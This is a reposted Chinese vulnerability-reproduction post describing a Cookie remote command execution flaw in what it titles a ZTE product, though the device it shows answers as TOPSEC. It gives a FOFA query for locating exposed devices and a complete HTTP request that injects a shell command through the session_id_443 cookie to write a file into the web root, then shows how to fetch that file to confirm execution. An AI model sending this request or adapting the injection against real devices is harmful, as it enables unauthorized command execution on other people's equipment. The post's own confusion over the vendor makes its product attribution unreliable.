【漏洞复现】ZTE公司 产品 Cookie 远程命令执行漏洞

admin 2024年1月5日08:43:33评论45 views字数 993阅读3分18秒阅读模式
使

01 漏洞名称

ZTE Cookie 远程命令执行漏洞

02 漏洞影响

天融信TOPSEC

【漏洞复现】ZTE公司 产品 Cookie 远程命令执行漏洞

ZTE 公司产品

【漏洞复现】ZTE公司 产品 Cookie 远程命令执行漏洞



03 FOFA搜索语句

title="Web User Login" && body="/cgi/maincgi.cgi?Url=VerifyCode"

漏洞复现

第一步,向目标发送如下数据包,生成一个字符串写入文件

GET /cgi/maincgi.cgi?Url=aa HTTP/1.1Host: x.x.x.xCookie: session_id_443=1|echo 'test' > /www/htdocs/site/image/test.txt;User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36

响应内容如下

HTTP/1.1 200 OKDate: Thu, 04 Jan 2024 10:44:22 GMTServer: TOPSECCache-Control: no-cachePragma: no-cacheSet-cookie: session_id_443=deleted; expires=Sat, 01 Jan 2011 00:00:00 GMT;path=/;Set-cookie: session_id_443=deleted; expires=Sat, 01 Jan 2011 00:00:00 GMT;path=/cgi/;Connection: closeContent-Type: text/html; charset=gb2312Content-Length: 122

<script>alert('操作超时');if(window.opener){window.opener.top.location='/';self.close();}else{top.location='/';}</script>

【漏洞复现】ZTE公司 产品 Cookie 远程命令执行漏洞

啊?TOPSEC?

第二步,访问回显文件

https://x.x.x.x/site/image/test.txt

【漏洞复现】ZTE公司 产品 Cookie 远程命令执行漏洞

漏洞复现成功

原文始发于微信公众号(法克安全):【漏洞复现】ZTE公司 产品 Cookie 远程命令执行漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月5日08:43:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】ZTE公司 产品 Cookie 远程命令执行漏洞https://cn-sec.com/archives/2365086.html

发表评论

匿名网友 填写信息